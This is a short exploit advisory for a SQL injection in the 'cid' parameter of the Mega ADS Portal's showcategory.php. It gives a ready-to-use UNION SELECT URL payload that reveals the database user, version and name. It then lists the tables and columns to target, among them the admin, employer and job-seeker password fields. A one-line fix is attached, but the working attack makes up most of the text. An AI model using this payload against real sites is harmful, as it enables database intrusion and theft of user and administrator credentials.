# Mega ADS Portal (cid) Remote SQL Injection Vulnerability
#========================================================
# Author: Hussin X
# Home : http://iq-ty.com/vb
# email: darkangel_g85[at]Yahoo[DoT]com
# Vendor : http://www.preprojects.com/ads.asp
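# Cause (inferred from the request below): the cid parameter of showcategory.php reaches the SQL query unvalidated, so an appended UNION SELECT is executed. Fix: cast cid to an integer or bind it in a prepared statement.
Exploit: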
server/Script/showcategory.php?cid=-21+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6--
__________________________
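Tables and columns listed by the author (table_name : column_name). The apass, epass and upass columns appear to hold account passwords, so on an affected install those credentials should be treated as exposed: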
configuration:paypal_email
configuration:vendorid
configuration:site_name
configuration:email
job_admin_login:aid
job_admin_login:apass
job_admin_login:name
job_admin_login:email
job_aplicants:job_id
job_education:uname
job_careerlevel:clname
job_employer_info:epass
job_employer_info:CompanyName
job_seeker_info:uname
job_seeker_info:upass
job_tempacc:user_id
end
IQ-SecuritY FoRuM